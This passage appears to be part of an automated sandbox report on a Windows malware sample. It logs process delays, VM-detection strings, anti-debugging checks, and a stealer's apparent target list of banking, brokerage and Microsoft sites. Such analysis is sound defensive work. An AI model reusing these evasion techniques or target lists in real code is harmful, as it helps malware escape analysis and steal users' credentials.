                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_6971BCEE FindFirstFileExW,29_2_6971BCEE
                              Source: C:\Windows\explorer.exeCode function: 4_2_09827B10 GetSystemInfo,VirtualAlloc,VirtualAlloc,4_2_09827B10
                              Source: C:\Windows\System32\audiodg.exeThread delayed: delay time: 50000Jump to behavior
                              Source: C:\Windows\System32\audiodg.exeThread delayed: delay time: 50000Jump to behavior
                              Source: C:\Windows\System32\audiodg.exeThread delayed: delay time: 50000Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeThread delayed: delay time: 50000Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeThread delayed: delay time: 50000Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeThread delayed: delay time: 50000Jump to behavior
                              Source: C:\Windows\explorer.exeThread delayed: delay time: 90000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeThread delayed: delay time: 30000
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeThread delayed: delay time: 180000
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeThread delayed: delay time: 180000
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeThread delayed: delay time: 30000
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Videos\desktop.ini
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Music\desktop.ini
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\OneDrive\desktop.ini
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local
                              Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                              Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                              Source: explorer.exe, 00000004.00000000.2052790919.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3489127190.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
                              Source: explorer.exe, 00000004.00000000.2052790919.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
                              Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                              Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                              Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                              Source: explorer.exe, 00000004.00000000.2047725228.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
                              Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                              Source: explorer.exe, 00000004.00000002.3489127190.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2052790919.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, Gxtuum.exe, 00000014.00000002.3380715534.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.2679991024.000001ED567DC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000018.00000002.2689505871.000001C0C6BBE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000018.00000002.2689505871.000001C0C6C00000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.3377277785.000000000328F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.3377277785.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3378440733.0000000003427000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2653558620.0000000005DF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000D17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                              Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                              Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                              Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                              Source: rundll32.exe, 00000018.00000002.2689505871.000001C0C6C0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\PN[
                              Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                              Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                              Source: explorer.exe, 00000004.00000000.2052790919.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
                              Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                              Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                              Source: explorer.exe, 00000004.00000000.2052790919.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
                              Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                              Source: explorer.exe, 00000004.00000000.2052790919.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                              Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                              Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                              Source: ssg.exe, 0000002C.00000002.3006898229.0000000003762000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655LRjq
                              Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                              Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                              Source: explorer.exe, 00000004.00000000.2050311869.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
                              Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                              Source: explorer.exe, 00000004.00000003.3104504813.0000000003553000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
                              Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                              Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                              Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                              Source: explorer.exe, 00000004.00000000.2052790919.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
                              Source: explorer.exe, 00000004.00000000.2052790919.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                              Source: explorer.exe, 00000004.00000000.2050311869.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                              Source: explorer.exe, 00000004.00000000.2050311869.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
                              Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                              Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                              Source: explorer.exe, 00000004.00000000.2052790919.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: explorer.exe, 00000004.00000003.3104504813.0000000003553000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                              Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                              Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                              Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                              Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                              Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                              Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                              Source: rundll32.exe, 00000018.00000002.2689505871.000001C0C6C0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}D
                              Source: ssg.exe, 0000002C.00000002.3006898229.000000000383A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655LRjqX
                              Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                              Source: rundll32.exe, 0000001E.00000002.3378440733.0000000003402000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                              Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                              Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                              Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                              Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                              Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                              Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                              Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                              Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                              Source: netsh.exe, 00000019.00000003.2417796249.0000023CBC004000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 0000001B.00000003.2417865024.0000018F9F854000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                              Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                              Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                              Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                              Source: rundll32.exe, 0000001E.00000002.3378440733.0000000003427000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWU
                              Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                              Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                              Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                              Source: explorer.exe, 00000004.00000000.2052790919.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                              Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                              Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                              Source: explorer.exe, 00000004.00000003.3104504813.0000000003553000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
                              Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                              Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                              Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                              Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                              Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                              Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                              Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                              Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                              Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                              Source: explorer.exe, 00000004.00000003.3104504813.0000000003553000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
                              Source: explorer.exe, 00000004.00000000.2052790919.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
                              Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                              Source: rundll32.exe, 00000016.00000002.2679991024.000001ED56728000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                              Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                              Source: explorer.exe, 00000004.00000000.2047725228.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                              Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeAPI call chain: ExitProcess graph end nodegraph_0-875
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeAPI call chain: ExitProcess graph end nodegraph_0-877
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeAPI call chain: ExitProcess graph end nodegraph_0-880
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeAPI call chain: ExitProcess graph end nodegraph_0-898
                              Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_1-879
                              Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_1-895
                              Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_1-885
                              Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_1-884
                              Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_1-875
                              Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end nodegraph_4-40057
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeAPI call chain: ExitProcess graph end nodegraph_6-934
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeAPI call chain: ExitProcess graph end nodegraph_6-932
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeAPI call chain: ExitProcess graph end nodegraph_6-953
                              Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end nodegraph_8-887
                              Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end nodegraph_8-884
                              Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end nodegraph_8-874
                              Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end nodegraph_8-896
                              Source: C:\Windows\System32\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_9-893
                              Source: C:\Windows\System32\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_9-897
                              Source: C:\Windows\System32\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_9-901
                              Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior

                              Anti Debugging

                              barindex
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeCode function: 0_2_00007FF79E38321C IsDebuggerPresent,GetCurrentProcess,CheckRemoteDebuggerPresent,0_2_00007FF79E38321C
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_6-1186
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_0-1131
                              Source: C:\Windows\System32\audiodg.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_8-1129
                              Source: C:\Windows\System32\svchost.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_1-1128
                              Source: C:\Windows\System32\msiexec.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_9-1144
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Windows\System32\svchost.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Windows\System32\audiodg.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Windows\System32\svchost.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Windows\System32\audiodg.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Windows\System32\svchost.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Windows\System32\audiodg.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeProcess queried: DebugPort
                              Source: C:\Windows\System32\svchost.exeProcess queried: DebugPort
                              Source: C:\Windows\System32\audiodg.exeProcess queried: DebugPort
                              Source: C:\Windows\System32\msiexec.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeProcess queried: DebugPort
                              Source: C:\Windows\System32\svchost.exeProcess queried: DebugPort
                              Source: C:\Windows\System32\audiodg.exeProcess queried: DebugPort
                              Source: C:\Windows\System32\msiexec.exeProcess queried: DebugPort
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeCode function: 0_2_00007FF79E38321C IsDebuggerPresent,GetCurrentProcess,CheckRemoteDebuggerPresent,0_2_00007FF79E38321C
                              Source: C:\Windows\explorer.exeCode function: 4_2_09847A24 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,4_2_09847A24
                              Source: C:\Windows\explorer.exeCode function: 4_2_098288B0 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,4_2_098288B0
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeCode function: 0_2_00007FF79E381050 LoadLibraryA,GetProcAddress,0_2_00007FF79E381050
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: 18_2_006BE250 mov eax, dword ptr fs:[00000030h]18_2_006BE250
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: 18_2_006C66E2 mov eax, dword ptr fs:[00000030h]18_2_006C66E2
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_007CE250 mov eax, dword ptr fs:[00000030h]19_2_007CE250
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_007D66E2 mov eax, dword ptr fs:[00000030h]19_2_007D66E2
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_007CE250 mov eax, dword ptr fs:[00000030h]20_2_007CE250
